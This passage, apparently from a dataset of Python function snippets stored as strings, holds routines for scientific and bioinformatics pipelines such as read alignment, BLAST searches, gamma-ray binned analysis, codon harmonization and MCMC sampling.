'\n '\\nDefault value: \"%(default)s\".')\n group.add_argument('--sample', nargs='+', action=required_length(2, 3),\n help='Space delimited sample UUID and fastq files in the format: uuid url1 [url2].')\n # Print docstring help if no arguments provided\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit(1)\n Job.Runner.addToilOptions(parser_run)\n args = parser.parse_args()\n # Parse subparsers related to generation of config and manifest\n cwd = os.getcwd()\n if args.command == 'generate-config' or args.command == 'generate':\n generate_file(os.path.join(cwd, 'config-toil-bwa.yaml'), generate_config)\n if args.command == 'generate-manifest' or args.command == 'generate':\n generate_file(os.path.join(cwd, 'manifest-toil-bwa.tsv'), generate_manifest)\n # Pipeline execution\n elif args.command == 'run':\n require(os.path.exists(args.config), '{} not found. Please run generate-config'.format(args.config))\n if not args.sample:\n args.sample = None\n require(os.path.exists(args.manifest), '{} not found and no sample provided. '\n 'Please run \"generate-manifest\"'.format(args.manifest))\n # Parse config\n parsed_config = {x.replace('-', '_'): y for x, y in yaml.load(open(args.config).read()).iteritems()}\n config = argparse.Namespace(**parsed_config)\n config.maxCores = int(args.maxCores) if args.maxCores else sys.maxint\n samples = [args.sample[0], args.sample[1:]] if args.sample else parse_manifest(args.manifest)\n # Sanity checks\n require(config.ref, 'Missing URL for reference file: {}'.format(config.ref))\n require(config.output_dir, 'No output location specified: {}'.format(config.output_dir))\n # Launch Pipeline\n Job.Runner.startToil(Job.wrapJobFn(download_reference_files, config, samples), args)", "def run (self, bioseqs, *clargs):\t\t\n\t\t## Preconditions:\n\t\tassert (2 <= len (bioseqs))\n\t\t## Main:\n\t\tself._inseqs = bioseqs\n\t\tself.call_cmdline (*clargs)", "def binAnalysis(self):\n self.mode = 'binned'\n # --------------------------------------------------------------------------------------------- #\n # Make sure that another working directory is selected\n if self.workpath == self.datapath:\n print(\"\\t=== Variable 'self.workpath' is equal to 'self.datapath', provide another ===\")\n return\n else:\n if os.path.isfile(self.outgtlike):\n print(\"\\t=== Directory {} already contains a complete analysis, remove the .dat file ===\".format(self.workpath))\n return\n else:\n pass\n print(\"\\t=== Binned analysis will be computed in '{}' ===\".format(self.workpath))\n\n # --------------------------------------------------------------------------------------------- #\n # Create a temporary python script and launch the Science Tools\n fil = os.path.join(self.workpath, 'tmp_BinnedAnalysis'+self.suffix+'.py')\n tmp = open(fil, 'w')\n tmp.write(\"import algamma; import os; a=algamma.algamma(); a.ft1='{}';\\\n a.ft2='{}'; a.metstart={}; a.metstop={}; a.emin={}; a.emax={}; a.suffix='{}';\\\n a.workpath='{}'; a._gtSelect(); a._gtMktime();\\\n a._gtLtcube(); a._gtBincube(); a._gtExpmap(); a._gtSrcmap();\\\n a._gtLike(); os.remove('{}')\".format(self.ft1, self.ft2, \n self.metstart, self.metstop, self.emin, self.emax,\n self.suffix, self.workpath, fil))\n # Launch the file\n os.popen(\"nohup python {} &\".format(fil))\n tmp.close()\n\n return", "def analysis_setup(self):\n pass", "def test_init_analysis(network):\n bf_init_analysis(\"test_analysis\", _stable_question_dir)", "def main():\r\n\tlang = get_arguments()\r\n\twiki_analyzer(lang)", "def main(aligner):\n\n # load config 
file\n config = file_utils.load_json(\n os.path.join(\n os.path.dirname(os.path.realpath(__file__)),\n 'config',\n 'normal_config.json',\n ))\n\n # map of type of analyses required before particular analysis can run\n # note: keep this order to avoid checking requirements more than once\n required_analyses_map = {\n 'annotation': [\n 'hmmcopy',\n 'align',\n ],\n 'hmmcopy': ['align'],\n 'align': [],\n }\n\n # get colossus analysis information objects with status not complete\n analyses = colossus_api.list(\n \"analysis_information\",\n analysis_run__run_status_ne=\"complete\",\n aligner=aligner if aligner else config[\"default_aligner\"],\n )\n\n for analysis in analyses:\n # get library id\n library_id = analysis[\"library\"][\"pool_id\"]\n log.info(f\"{library_id}\")\n\n # skip analysis if marked as complete\n status = analysis[\"analysis_run\"][\"run_status\"]\n\n # skip analyses older than this year\n # parse off ending time range\n last_updated_date = parser.parse(analysis[\"analysis_run\"][\"last_updated\"][:-6])\n if last_updated_date < datetime(2020, 1, 1):\n continue\n\n jira_ticket = analysis[\"analysis_jira_ticket\"]\n log.info(f\"checking ticket {jira_ticket} library {library_id}\")\n for analysis_type in required_analyses_map:\n log.info(f\"checking requirements for {analysis_type}\")\n # check if analysis exists on tantalus\n try:\n tantalus_analysis = tantalus_api.get(\n 'analysis',\n jira_ticket=jira_ticket,\n analysis_type__name=analysis_type,\n )\n except:\n tantalus_analysis = None\n\n if tantalus_analysis is not None:\n # check if running or complete\n status = tantalus_analysis[\"status\"]\n if status in ('running', 'complete'):\n log.info(f\"skipping {analysis_type} for {jira_ticket} since status is {status}\")\n\n # update run status on colossus\n if analysis_type == \"annotation\" and status == \"complete\":\n analysis_run_id = analysis[\"analysis_run\"][\"id\"]\n analysis_run = colossus_api.get(\"analysis_run\", id=analysis_run_id)\n colossus_api.update(\"analysis_run\", id=analysis_run_id, run_status=\"complete\")\n\n continue\n\n log.info(f\"running {analysis_type} in library {library_id} with ticket {jira_ticket}\")\n # otherwise run analysis\n saltant_utils.run_analysis(\n tantalus_analysis['id'],\n analysis_type,\n jira_ticket,\n config[\"scp_version\"],\n library_id,\n aligner if aligner else config[\"default_aligner\"],\n config,\n )\n else:\n # set boolean determining trigger of run\n is_ready_to_create = True\n # check if required completed analyses exist\n for required_analysis_type in required_analyses_map[analysis_type]:\n try:\n required_analysis = tantalus_api.get(\n 'analysis',\n jira_ticket=jira_ticket,\n analysis_type__name=required_analysis_type,\n status=\"complete\",\n )\n except:\n log.error(\n f\"a completed {required_analysis_type} analysis is required to run before {analysis_type} runs for {jira_ticket}\"\n )\n # set boolean as false since analysis cannot be created yet\n is_ready_to_create = False\n break\n\n # create analysis and trigger on saltant if analysis creation has met requirements\n if is_ready_to_create:\n log.info(f\"creating {analysis_type} analysis for ticket {jira_ticket}\")\n\n try:\n tantalus_utils.create_qc_analyses_from_library(\n library_id,\n jira_ticket,\n config[\"scp_version\"],\n analysis_type,\n )\n except Exception as e:\n log.error(f\"failed to create {analysis_type} analysis for ticket {jira_ticket}\")\n continue\n tantalus_analysis = tantalus_api.get(\n 'analysis',\n jira_ticket=jira_ticket,\n 
analysis_type__name=analysis_type,\n )\n\n log.info(f\"running {analysis_type} in library {library_id} with ticket {jira_ticket}\")\n saltant_utils.run_analysis(\n tantalus_analysis['id'],\n analysis_type,\n jira_ticket,\n config[\"scp_version\"],\n library_id,\n aligner if aligner else config[\"default_aligner\"],\n config,\n )\n\n # get completed analyses that need montage loading\n analyses = colossus_api.list(\n \"analysis_information\",\n montage_status=\"Pending\",\n analysis_run__run_status=\"complete\",\n )\n\n for analysis in analyses:\n # get library id\n library_id = analysis[\"library\"][\"pool_id\"]\n\n # skip analyses older than this year\n # parse off ending time range\n last_updated_date = parser.parse(analysis[\"analysis_run\"][\"last_updated\"][:-6])\n if last_updated_date < datetime(2020, 1, 1):\n continue\n\n jira_ticket = analysis[\"analysis_jira_ticket\"]\n update_jira_dlp(jira_ticket, \"M\")\n # upload qc report to jira ticket\n attach_qc_report(jira_ticket, library_id, config[\"storages\"])\n\n # load analysis into montage\n load_ticket(jira_ticket)", "def main(args):\n print('loading {}'.format(args.stem_path))\n y, fs = librosa.load(args.stem_path, sr=44100)\n notes = mono_anal(y, fs)\n jam = output_to_jams(y, fs, notes, args)\n jam_path = args.stem_path.split('.')[0]+'.jams'\n jam.save(jam_path)\n print('jams file generated')\n return 0", "def run_real(self):\n\n if len(self.args) == 1:\n slice_file = \"-\"\n seq_file = self.args[0]\n elif len(self.args) == 2:\n slice_file = self.args[0]\n seq_file = self.args[1]\n else:\n self.parser.print_help()\n return 1\n\n self.load_sequences(seq_file)\n self.process_file(slice_file)", "def initiateAnalysis(self,):\n\n #\n # Imports\n #\n import os\n import sys\n\n #\n # get optional arguments from commandline\n #\n self.getComandLineOptions()\n \n #\n # for logmessages\n #\n tmpLogMessages = ['----------------\\n']\n tmpLogMessage = self.createLogHeader()\n tmpLogMessages.append(tmpLogMessage)\n #print tmpLogMessage\n \n #\n # check analysis path\n #\n if os.path.isdir(self.analysisPath):\n tmpLogMessage = 'WARNING: the analysis path already exists.\\n'\n print tmpLogMessage\n tmpLogMessages.append(tmpLogMessage)\n else:\n tmpLogMessage = 'Creating directory \"'+self.analysisPath+'\".\\n'\n #print tmpLogMessage\n tmpLogMessages.append(tmpLogMessage)\n os.makedirs(self.analysisPath)\n \n #\n # create the logfile\n #\n tmpLogMessages += self.openLogfileConnection()\n \n #\n # write tmpLogMessages to logfile\n #\n SEAseqPipeLine.logfile.write(''.join(tmpLogMessages))\n \n #\n # create the database\n #\n self.database.create()\n \n #\n # add run to runs table\n #\n self.database.addToRunsTable(self.startTimeStr, self.command, self.commandLine, True, MASTER)\n \n return 0", "def run(self):\n # params\n work_dir = self.param_required(\"work_dir\")\n\n # initial sequence loading, using ensembl-analysis scripts \n self.initial_sequence_loading(work_dir)\n\n # load data from the corresponding core db tables\n external_db_map = self.load_map_from_core_db(\"external_db\", [\"db_name\", \"external_db_id\"], work_dir) # for external_db\n attrib_type_map = self.load_map_from_core_db(\"attrib_type\", [\"code\", \"attrib_type_id\"], work_dir) # for attrib_type\n seq_region_map = self.load_map_from_core_db(\"seq_region\", [\"name\", \"seq_region_id\"], work_dir) # for seq_region\n\n # update synonyms and seq_region_attribs\n unversion = self.param(\"unversion_scaffolds\")\n is_primary_assembly = self.from_param(\"manifest_data\", \"agp\", 
not_throw = True) is None\n seq_region_file = self.from_param(\"manifest_data\", \"seq_region\", not_throw = True)\n\n # add seq_region synonyms\n self.add_sr_synonyms(seq_region_file,\n seq_region_map,\n external_db_map,\n self.pjc(work_dir, \"seq_region_syns\"),\n unversion = unversion)\n\n # add seq_region attributes\n self.add_sr_attribs(seq_region_file,\n seq_region_map,\n attrib_type_map,\n self.pjc(work_dir, \"seq_region_attr\"),\n unversion = unversion)\n\n # add seq_region EBI and BRC4 name attributes in the \"BRC4 mode\"\n # special case of attributes adding with default values derived from seq_region names\n # do not add if preparing to swap RefSeq and GeneBank ids; in this case attributes to be added at a later stage in pipeline\n # (easier to insert then to update)\n if self.param(\"brc4_mode\") and not self.param(\"swap_gcf_gca\"):\n self.add_sr_ebi_brc4_names(seq_region_file,\n seq_region_map,\n attrib_type_map,\n self.pjc(work_dir, \"seq_region_ebi_brc4_name\"),\n unversion = unversion)\n\n # add karyotype related data\n self.add_karyotype_data(seq_region_file,\n seq_region_map,\n attrib_type_map,\n self.pjc(work_dir, \"karyotype\"),\n unversion = unversion)", "def export_bioanalyzer(args):\n clarity_epp.export.bioanalyzer.samplesheet(lims, args.process_id, args.output_file)", "def main():\n \n # Load the model\n model = EpamModel()\n model.load(\"bayes_1.zip\")\n \n # Load and clean/prepare test data \n x_test = pd.read_csv('BAZA_VALID_INPUT.csv')\n x_test_clean = cleanup_df(x_test)\n \n # Predict\n # FIXME: This currently does probabilistic prediction only!\n y_pred = model.predict(x_test_clean)\n \n with open('output.txt', 'w+') as f:\n for label in y_pred:\n f.write(f'{label}\\n')", "def run_blast(self, metadata, analysistype, program, outfmt, evalue='1E-5', num_threads=12, num_alignments=1000000,\n perc_identity=70, task='blastn'):\n with progressbar(metadata) as bar:\n for sample in bar:\n # Run the BioPython BLASTn module with the genome as query, fasta (target gene) as db.\n make_path(sample[analysistype].reportdir)\n # Set the name and path of the BLAST report as reportdir/samplename_blastprogram.tsv\n sample[analysistype].report = os.path.join(\n sample[analysistype].reportdir, '{name}_{program}_{at}.tsv'.format(name=sample.name,\n program=program,\n at=analysistype))\n # Check the size of the report (if it exists). If it has size 0, something went wrong on a previous\n # iteration of the script. 
Delete the empty file in preparation for another try\n try:\n size = os.path.getsize(sample[analysistype].report)\n # If a report was created, but no results entered - program crashed, or no sequences passed\n # thresholds, remove the report, and run the blast analyses again\n if size == 0:\n os.remove(sample[analysistype].report)\n except FileNotFoundError:\n pass\n # Split the extension from the file path\n db = os.path.splitext(sample[analysistype].combinedtargets)[0]\n # Create the command line argument using the appropriate BioPython BLAST wrapper\n if program == 'blastn':\n blast = self.blastn_commandline(sample=sample,\n analysistype=analysistype,\n db=db,\n evalue=evalue,\n num_alignments=num_alignments,\n num_threads=num_threads,\n outfmt=outfmt,\n perc_identity=perc_identity,\n task=task)\n elif program == 'blastp':\n blast = self.blastp_commandline(sample=sample,\n analysistype=analysistype,\n db=db,\n evalue=evalue,\n num_alignments=num_alignments,\n num_threads=num_threads,\n outfmt=outfmt)\n elif program == 'blastx':\n blast = self.blastx_commandline(sample=sample,\n analysistype=analysistype,\n db=db,\n evalue=evalue,\n num_alignments=num_alignments,\n num_threads=num_threads,\n outfmt=outfmt)\n elif program == 'tblastn':\n blast = self.tblastn_commandline(sample=sample,\n analysistype=analysistype,\n db=db,\n evalue=evalue,\n num_alignments=num_alignments,\n num_threads=num_threads,\n outfmt=outfmt)\n elif program == 'tblastx':\n blast = self.tblastx_commandline(sample=sample,\n analysistype=analysistype,\n db=db,\n evalue=evalue,\n num_alignments=num_alignments,\n num_threads=num_threads,\n outfmt=outfmt)\n else:\n blast = str()\n assert blast, 'Something went wrong, the BLAST program you provided ({program}) isn\\'t supported'\\\n .format(program=program)\n # Save the blast command in the metadata\n sample[analysistype].blastcommand = str(blast)\n # Only run blast if the report doesn't exist\n if not os.path.isfile(sample[analysistype].report):\n try:\n blast()\n except ApplicationError as e:\n logging.debug(e)\n try:\n os.remove(sample[analysistype].report)\n except (IOError, ApplicationError):\n pass\n # Return the updated metadata object\n return metadata", "def main(argv=None):\n\n if argv is None:\n argv = sys.argv\n\n parser = E.OptionParser(\n version=\"%prog version: $Id: maq2assembly.py 2781 2009-09-10 11:33:14Z andreas $\")\n\n parser.add_option(\"-f\", \"--is-forward-coordinates\", dest=\"forward_coordinates\",\n help=\"translate to forward coordinates.\", action=\"store_true\")\n\n parser.add_option(\"-p\", \"--output-filename-pattern\", dest=\"output_filename_pattern\", type=\"string\",\n help=\"OUTPUT filename pattern for additional data [%default].\")\n\n parser.add_option(\"--method\", dest=\"methods\", type=\"choice\", action=\"append\",\n choices=(\"gff\", \"coverage\", \"region\", \"quality\"),\n help=\"methods to apply [%default].\")\n\n parser.set_defaults(\n output_format=\"%08i\",\n output_filename_pattern=\"%s\",\n methods=[],\n )\n\n (options, args) = E.Start(parser)\n\n ################################################\n ################################################\n ################################################\n # pick a processor\n ################################################\n methods = []\n\n if len(options.methods) == 0:\n raise \"please supply at least one method to apply.\"\n\n genome_fasta, queries_fasta = None, None\n\n for method in options.methods:\n if method == \"gff\":\n methods.append(BuilderGFF(genome_fasta, 
queries_fasta, options))\n elif method == \"coverage\":\n methods.append(\n BuilderCoverage(genome_fasta, queries_fasta, options))\n elif method == \"quality\":\n methods.append(\n BuilderQuality(genome_fasta, queries_fasta, options))\n elif method == \"region\":\n methods.append(BuilderRegion(genome_fasta, queries_fasta, options))\n\n for method in methods:\n method.printHeader()\n\n ninput, noutput = 0, 0\n id = 0\n for contig, start, end, reads, qualities in reader(options.stdin):\n\n ninput += 1\n id += 1\n for m in methods:\n m(id, contig, start, end, reads, qualities)\n\n noutput += 1\n\n options.stdlog.write(\"# ninput=%i, noutput=%i\\n\" % (ninput, noutput))\n\n E.Stop()", "def main():\n\n # Parse arguments. The parser will raise an exception if required arguments are not present.\n parser = argparse.ArgumentParser()\n\n subparsers = parser.add_subparsers(dest='command')\n\n # Arguments for the runtest command.\n cmd_runtest = subparsers.add_parser('runtest')\n runtest_required_named = cmd_runtest.add_argument_group('named arguments')\n runtest_required_named.add_argument('-c', '--corpus',\n help='Corpus root directory containing all speakers.',\n metavar='corpus',\n required=True)\n runtest_required_named.add_argument('-o', '--csvout',\n help='CSV output file.',\n metavar='csvout',\n required=True)\n runtest_required_named.add_argument('-i', '--impl',\n help='Test runner implementation: fast, medium or slow.',\n metavar='impl',\n required=False,\n default='fastest')\n\n # Arguments for the analyse command.\n cmd_analyse = subparsers.add_parser('analyse')\n analyse_required_named = cmd_analyse.add_argument_group('named arguments')\n analyse_required_named.add_argument('-r', '--results',\n help='Input CSV results file.',\n metavar='results',\n required=True)\n analyse_required_named.add_argument('-t', '--th_user',\n help='User-defined threshold.',\n metavar='th_user',\n required=False,\n type=float,\n default=5.79)\n\n # Parse the arguments.\n args = parser.parse_args()\n\n # Dispatch to the correct command.\n if args.command == 'runtest':\n do_runtest(args)\n elif args.command == 'analyse':\n do_analyse(args)\n else:\n raise ValueError('Unknown command {}'.format(args.command))", "def main():\n (\n calibration_file,\n drs4_ped_file,\n time_calibration_file,\n systematic_correction_file,\n drive_log_file,\n run_summary_file,\n pedestal_ids_file,\n run_number,\n ) = data_sequence_cli_parsing()\n\n if options.verbose:\n log.setLevel(logging.DEBUG)\n else:\n log.setLevel(logging.INFO)\n\n # Run the routine piping all the analysis steps\n rc = data_sequence(\n calibration_file,\n drs4_ped_file,\n time_calibration_file,\n systematic_correction_file,\n drive_log_file,\n run_summary_file,\n pedestal_ids_file,\n run_number,\n )\n sys.exit(rc)", "def main():\n\n # Parse command line arguments\n args = parse_arguments()\n # Initialize logging\n logger = initialize_logger(args.prefix)\n\n # Set translation tables according to user input. 
Defaults to standard genetic code (table 1)\n if args.translation_table_origin:\n translation_table_origin = args.translation_table_origin\n else:\n translation_table_origin = 1\n\n if args.translation_table_host:\n translation_table_host = args.translation_table_host\n else:\n translation_table_host = 1\n\n # set threshold if provided by the user and otherwise fall back to defaults\n if args.threshold:\n lower_threshold = args.threshold\n elif args.frequency:\n lower_threshold = 5\n else:\n lower_threshold = 0.1\n\n # initialize Sequence object with user provided input\n sequence = Sequence(IO.load_file(args.input), args.origin, args.host,\n translation_table_origin=translation_table_origin,\n translation_table_host=translation_table_host,\n use_frequency=args.frequency,\n lower_threshold=lower_threshold,\n lower_alternative=args.lower_frequency_alternative)\n\n # harmonize the provided sequence\n harmonized_codons = sequence.get_harmonized_codons()\n # check if input and output sequence are identical\n verify_sequence = sequence.verify_harmonized_sequence()\n\n # log summary to standard output and log file\n logger.info('SUMMARY:\\n')\n if verify_sequence:\n text = 'Success! Translation of harmonized and original sequence match:\\n\\n' \\\n '{}\\n'.format(sequence.harmonized_translated_sequence)\n logger.info(text)\n else:\n logger.error('ERROR: Translations of harmonized and original sequence DO NOT match!')\n logger.info('Harmonized codons: {}\\n'.format(len(harmonized_codons)))\n\n df_above_thresh = 0\n for c in sequence.codons:\n if c['final_df'] > 0.2:\n df_above_thresh += 1\n\n if df_above_thresh > 0:\n logger.warning(\"WARNING: Difference in origin and target host codon usage of {} out of {} codons ({}%) exceeds 20%!\\n\".format(df_above_thresh,\n len(sequence.codons),\n round(df_above_thresh/len(sequence.codons)*100, 1)))\n else:\n logger.info(\"Differences of codon usage in origin and target host are within 20%.\\n\")\n\n table_header = '{:<10} {:^3} {:^4} {:^4} {:^7} {:>6} {:<7} {:>6}'.format('position', 'aa', 'orig', 'new',\n 'initial', 'final', 'origin', 'target')\n logger.info(table_header)\n\n warnings = []\n\n # Iterate over all codons in the sequence and print some statistics and information\n for c in sequence.codons:\n if str(c['original']) != str(c['new']):\n line = '{:<10} {:^3} {:<4} -> {:<4} {:<5.2f} -> {:<3.2f} {:<5.2f} -> {:<3.2f}'.format(c['position'],\n c['aa'],\n c['original'],\n c['new'],\n c['initial_df'],\n c['final_df'],\n c['origin_f'],\n c['target_f'])\n else:\n line = '{:<10} {:^3} {:<12} {:<5.2f} {:<5.2f} -> {:<3.2f}'.format(c['position'],\n c['aa'],\n c['original'],\n c['initial_df'],\n c['origin_f'],\n c['target_f'])\n if c['ambiguous']:\n line += ' WARNING: Original codon is ambiguous!'\n warnings.append('Codon {} ({}) coding for {} is ambiguous! 
{} was chosen for the '\n 'harmonized sequence!'.format(c['position'],\n c['original'],\n c['aa'],\n c['new']))\n\n logger.info(line)\n\n logger.info('\\nCodon-harmonized sequence:\\n\\n{}'.format(sequence.harmonized_sequence))\n if warnings:\n logger.warn('\\nWARNINGS OCCURRED DURING HARMONIZATION:\\n')\n for warning in warnings:\n logger.warn(warning)\n\n plot(sequence, args.prefix)\n\n # Exit gracefully\n exit(0)", "def execute(self, targets):", "def bayesian(self, \n sammy_inputs, # inp (from self.endf2inp_par_ndf()), par, cov\n xs_measurement, # CrossSection instance\n sammy_outputs # par, cov\n ):\n # Set up temporary files #\n tempinp = temp_file_gen('Sammy_bayesian','inp')\n tempdata = temp_file_gen('Sammy_bayesian','dat')\n shutil.copy(sammy_inputs[0], tempinp)\n sammy_inputs[0] = tempinp\n # \n # Construct .dat file from xs_measurement #\n data = np.array([xs_measurement.energies, \n xs_measurement.cross_section,\n xs_measurement.statistical_unc]).T\n self.write_data(data, tempdata)\n #\n # Include .dat file in list of SAMMY inputs #\n sammy_inputs.insert(2,tempdata)\n #\n # Change reaction type in input file #\n self.modify_inp(sammy_inputs[0], new_type = xs_measurement.sammy_type)\n #\n if self.include_correlations:\n # Add experimental uncertainties to inp file #\n self.exp_unc_into_inp(sammy_inputs[0], xs_measurement)\n #\n # Run SAMMY #\n self.run(sammy_inputs, ['SAMMY.PAR','SAMMY.COV'], \n output_names = sammy_outputs)\n #\n # Clean up #\n if self.cleanup:\n for p in [tempinp, tempdata]: os.remove(p)\n #", "def runall():\n sclogic.runall()", "def __init__(self, reads1, reads2):\n print \"Start Analysis...\"\n self.alignment()\n self.sai_to_sam()\n self.sam_to_bam()\n #self.clean_files()", "def main(yaml_file, plot, sampler_file, write, direc, label, plot_format):\n if mpi.am_single_or_primary_process:\n console = Console(width=100)\n console.print(\n Panel(\"Welcome to yabf!\", box=box.DOUBLE_EDGE),\n style=\"bold\",\n justify=\"center\",\n )\n start = time.time()\n\n likelihood = load_likelihood_from_yaml(yaml_file)\n output_prefix = Path(direc) / (label or likelihood.name or Path(yaml_file).stem)\n if not output_prefix.parent.exists():\n output_prefix.mkdir(parents=True)\n\n if sampler_file is not None:\n sampler, runkw = load_sampler_from_yaml(\n sampler_file,\n likelihood,\n override={\"output_prefix\": output_prefix},\n )\n else:\n sampler, runkw = load_from_yaml(\n yaml_file,\n override={\"output_prefix\": output_prefix},\n )\n\n # make sure it's the same as the actual sampler.\n output_prefix = sampler.output_file_prefix\n\n if mpi.am_single_or_primary_process:\n console.print(Rule(f\"Sampler [{sampler.__class__.__name__}] \"))\n console.print(f\"[bold]Sampler Options:[/] {sampler.sampler_kwargs}\")\n console.print(f\"[bold]Run Options:[/] {runkw}\")\n console.print(f\"[bold]Output Directory:[/]\\t{sampler.output_dir}\")\n console.print(f\"[bold]Output Prefix:[/]\\t{sampler.output_file_prefix}\")\n\n console.print()\n console.print(Rule(\"Model\"))\n\n console.print(\"[bold]Likelihoods[/]\")\n for lk in likelihood._subcomponents:\n if isinstance(lk, _LikelihoodInterface):\n console.print(lk.name)\n console.print()\n\n console.print(\"[bold]Components[/]\")\n for loc, cmp in likelihood.child_components.items():\n if not isinstance(cmp, _LikelihoodInterface):\n console.print(loc)\n console.print()\n\n console.print(\n f\"[bold]Active Parameters[/] [blue]({len(likelihood.child_active_params)})[/] \"\n )\n _len = max(len(p.name) for p in likelihood.child_active_params)\n 
_dlen = max(len(str(p.determines)) for p in likelihood.child_active_params)\n for p in likelihood.child_active_params:\n det = str(p.determines).replace(\"'\", \"\").replace(\"(\", \"\").replace(\")\", \"\")\n fid = \"[\" + str(p.fiducial) + \"]\"\n console.print(f\"{p.name:<{_len}} {fid:<8} -----> {det:<{_dlen}}\")\n\n fit_params = sum((p.determines for p in likelihood.child_active_params), ())\n console.print()\n console.print(\"[bold]In-active parameters[/]\")\n for lc in likelihood.child_base_parameter_dct:\n if lc not in fit_params:\n console.print(\n f\"{lc} = {utils.get_loc_from_dict(likelihood.fiducial_params, lc)}\"\n )\n\n console.print()\n console.print(Rule(\"Starting MCMC\"))\n\n mpi.sync_processes()\n mcsamples = sampler.sample(**runkw)\n mpi.sync_processes()\n\n if mpi.am_single_or_primary_process:\n console.print(\"Done.\\n\")\n console.print(Rule())\n console.print()\n console.print(Rule(\"[bold]Basic Chain Diagnostics[/]\"))\n\n try:\n gr = mcsamples.getGelmanRubin()\n except Exception:\n gr = \"unavailable\"\n\n console.print(\"Gelman-Rubin Statistic: \", gr)\n console.print()\n console.print(Rule(\"Correlation Lengths\"))\n for i, p in enumerate(mcsamples.getParamNames().names):\n corrlength = mcsamples.getCorrelationLength(i, weight_units=False)\n console.print(f\"{p.name}:\\t{corrlength:1.3e}\")\n\n console.print()\n console.print(\"Mean (+- std) Posterior Values:\")\n mean = mcsamples.getMeans()\n std = mcsamples.getVars()\n\n for m, s, p in zip(mean, std, mcsamples.getParamNames().names):\n console.print(f\"{p.name}:\\t{m:1.3e} +- {s:1.3e}\")\n\n if plot and HAVE_MPL:\n g = plots.getSubplotPlotter()\n g.triangle_plot(\n mcsamples, params=list(likelihood.child_active_params), shaded=True\n )\n\n plt.savefig(f\"{output_prefix}_corner.{plot_format}\")\n\n if write:\n mcsamples.saveAsText(output_prefix)\n\n tot = time.time() - start\n\n console.print(\n f\":tada: Finished in {tot//3600}:{(tot%3600)//60}:{(tot%3600)%60} (h:m:s) :tada:\",\n style=\"bold green\",\n )\n return 0", "def output_main(args):\n\t#clean input file (fold and remove escape chars)\n\treference = clean_fasta(args.infile)\n\tfilterthreshold = args.threshold\n\t#look up proper readset using readset module\n\treadset = args.readset\n\t#if readset is in fasta format, inject fake quality scores\n\t\n\t#run bwa\n\tsamfile = run_bwa(reference, readset)\n\t#convert sam to bam file, and sort\n\tsortedbam = sam_to_sorted_bam(reference, samfile)\n\t#run variant caller freebayes\n\tvcffile = run_var_caller(reference, sortedbam)\n\t#run hapcut suite\n\thapoutfile = run_haplotyper(reference, vcffile, sortedbam, filterthreshold)\n\t#convert hapcut output to sequence and gff\n\tcalls_to_gff(reference, hapoutfile)", "def main(args):\n samples = TQSampleFolder.loadLazySampleFolder(args.input_file + \":\" + args.sample_folder)\n reader = TQSampleDataReader(samples)\n\n # this list contains 2-tuples with (\"CutName\", \"HistogramName\")\n hist_info = list()\n hist_info.append((\"Cut2TagMllSR1VBFVeto\", \"NN_SR1_Signal_Rebin\", \"[ee+mm+em+me]\"))\n hist_info.append((\"Cut2TagMllSR1VBFVeto\", \"NN_SR1_Top\", \"[ee+mm+em+me]\"))\n hist_info.append((\"Cut2TagMllSR1VBFVeto\", \"NN_SR1_Other\", \"[ee+mm+em+me]\"))\n\n processes = list()\n processes.append(Process(\"sig\", r\"Signal\", \"/sig/{channel}/{campaign}/nonres\"))\n processes.append(Process(\"bkg\", r\"Background\", \"/bkg/{channel}/{campaign}/[prompt+nonprompt]\"))\n\n output_directory = \"results/mva_yields_soverb/\"\n ensure_directory(output_directory)\n 
output_file_name = os.path.splitext(os.path.basename(args.input_file))[0] + \".tex\"\n\n with LaTeXFile.from_rel_path(os.path.join(output_directory, output_file_name)) as tex:\n tex.document_settings.append(\"landscape\")\n tex.write_header()\n tex.begin_document()\n\n logging.info(\"Getting per-bin significances\")\n for cut_name, histogram_name, channel in hist_info:\n logging.info(\"Processing %s/%s\", cut_name, histogram_name)\n hists = dict()\n for process in processes:\n campaign = \"[c16a+c16d+c16e]\"\n hists[process.name] = reader.getHistogram(\n process.path.format(channel=channel, campaign=campaign), \"{}/{}\".format(cut_name, histogram_name)\n )\n\n table_data = list()\n sigs = list()\n hist_sig = hists[\"sig\"]\n hist_bkg = hists[\"bkg\"]\n for i in range(1, hist_sig.GetNbinsX() + 1):\n s = hist_sig.GetBinContent(i)\n b = hist_bkg.GetBinContent(i)\n\n if b != 0:\n # z = math.sqrt(2 * ((s + b) * math.log(1 + s / b) - s))\n z = s / math.sqrt(b)\n sigs.append(z)\n else:\n z = \"--\"\n table_data.append((i, z))\n logging.debug(\"Bin % 2d: %g\", i, z)\n table_data.append((\"Total\", math.sqrt(sum([z ** 2 for z in sigs]))))\n\n tex.write_table(\n table_data,\n [\"{}\", \"{:.4f}\"],\n [\"Bin\", \"Significance\"],\n \"{}/{}\".format(cut_name, histogram_name),\n format_rows=\"cc\",\n )\n\n tex.end_document()\n tex.write_make_file()", "def run(self):\n contig_file = self.data.contigfiles[0]\n reads = self.data.readfiles\n\n ## Index contigs using IS algorithm\n prefix = os.path.join(self.outpath, 'bt2')\n cmd_args = [self.build_bin, '-f', contig_file, prefix]\n self.arast_popen(cmd_args, overrides=False)\n\n ## Align reads\n samfile = os.path.join(self.outpath, 'align.sam')\n cmd_args = [self.executable, '-x', prefix, '-S', samfile,\n '-p', self.process_threads_allowed]\n if len(reads) == 2:\n cmd_args += ['-1', reads[0], '-2', reads[1]]\n elif len(reads) == 1:\n cmd_args += ['-U', reads[0]]\n else:\n raise Exception('Bowtie plugin error')\n self.arast_popen(cmd_args, overrides=False)\n\n if not os.path.exists(samfile):\n raise Exception('Unable to complete alignment')\n return {'alignment': samfile}", "def main():\n parser = argparse.ArgumentParser()\n\n # Add arguments to parser\n parser.add_argument(\n '-base_data_dir', default='../data',\n help='Root directory of data', type=str)\n parser.add_argument(\n '-dataset', default='litbank', choices=['litbank', 'ontonotes'], type=str)\n parser.add_argument('-base_model_dir',\n default='../models',\n help='Root folder storing model runs', type=str)\n parser.add_argument('-model_size', default='large', type=str,\n help='BERT model type')\n parser.add_argument('-doc_enc', default='overlap', type=str,\n choices=['independent', 'overlap'], help='BERT model type')\n parser.add_argument('-pretrained_bert_dir', default='../resources', type=str,\n help='SpanBERT model location')\n parser.add_argument('-max_segment_len', default=512, type=int,\n help='Max segment length of BERT segments.')\n parser.add_argument('-top_span_ratio', default=0.3, type=float,\n help='Ratio of top spans proposed as mentions.')\n\n parser.add_argument('-ment_emb', default='endpoint', choices=['attn', 'max', 'endpoint'],\n type=str)\n parser.add_argument('-max_span_width',\n help='Max span width', default=20, type=int)\n 